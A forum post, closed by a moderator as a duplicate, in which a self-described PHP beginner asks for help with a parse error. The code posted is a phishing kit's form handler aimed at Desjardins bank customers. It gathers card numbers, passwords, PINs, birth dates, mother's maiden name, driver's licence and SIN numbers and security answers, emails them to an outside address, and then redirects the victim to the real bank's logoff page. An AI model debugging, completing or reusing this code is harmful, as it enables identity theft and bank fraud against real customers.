Thread closed as duplicate posting. ~ mod

HI GUYS
I REALLY NEED HELP . IM NEW WITH PHP ! WHEN IM TRYIN TO VALIDATE THE FORM I HAVE THIS ERROR

Parse error: syntax error, unexpected T_STRING in /home/desjar55/public_html/servelet.php on line 56

Parse error: syntax error, unexpected T_STRING in /home/desjar55/public_html/servelet.php on line 56

    <?php
    ini_set("output_buffering",4096);
    session_start();

    $cc = $_SESSION['cc'];

    $pass = $POST['pass'];
    $day = $
    POST['day'];
    $year = $POST['year'];
    $month = $
    POST['month'];
    $nas = $POST['nas'];
    $nip = $
    POST['nip'];
    $mmn = $POST['mmn'];
    $dl = $
    POST['dl'];
    $address = $POST['address'];
    $s1 = $
    POST['s1'];
    $s2 = $POST['s2'];
    $s3 = $
    POST['s3'];

    $q1 = $SESSION['q1'];
    $a1 = $
    SESSION['a1'];
    $q2 = $SESSION['q2'];
    $a2 = $
    SESSION['a2'];
    $q3 = $SESSION['q3'];
    $a3 = $
    SESSION['a3'];

    $ip = getenv("REMOTE_ADDR");
    $browser = $_SERVER['HTTP_USER_AGENT'];

    $data="
    Card Nr: $cc

    Passwd : $pass

    Dob: $day - $month - $year
    PIN : $nip
    Address: $address
    MMN: $mmn
    DL: $dl

    SIN: $s1-$s2-$s3

    Q1 : $q1

    A1 : $a1

    Q2 : $q2

    A2 : $a2

    Q3 : $q3
    A3 : $a3
    ";

    $subject = "DES"
    $mail = "zz22_4@yahoo.ca";
    mail($mail, $subject, $data, "Content-type: text/plain\n");

    echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1250"><meta http-equiv="refresh" content="0; url=https://accesd.desjardins.com/tisecuADGestionAcces/logoff.do?msgId=logoff&token=8350AC5E50140A3F&contexte=109000000020&randomNo=0.2725414362023033"><title>Redirect</title></head><body></div></body></html>';

    ?>

      Write a Reply...